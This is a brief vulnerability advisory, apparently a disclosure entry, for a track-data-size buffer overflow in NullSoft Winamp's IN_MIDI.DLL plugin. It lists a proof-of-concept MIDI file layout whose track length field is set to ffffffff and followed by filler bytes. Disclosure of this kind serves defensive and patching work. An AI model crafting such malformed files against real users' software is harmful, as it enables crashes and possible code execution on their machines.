NullSoft Winamp MIDI Plugin IN_MIDI.DLL Track Data Size Buffer Overflow Vulnerability

NullSoft Winamp MIDI Plugin IN_MIDI.DLL Track Data Size Buffer Overflow Vulnerability

The following proof of concept has been supplied:

4 bytes MIDI Header "MThd"
4 bytes Header data size 00000006
2 bytes Format 0000
2 bytes Number of tracks 0001
2 bytes Divisions 0001
4 bytes Track Header "MTrk"
4 bytes Track data size ffffffff <--- bug
... "aaaaaaaaaaaaaaaaaaaaa..." <--- fun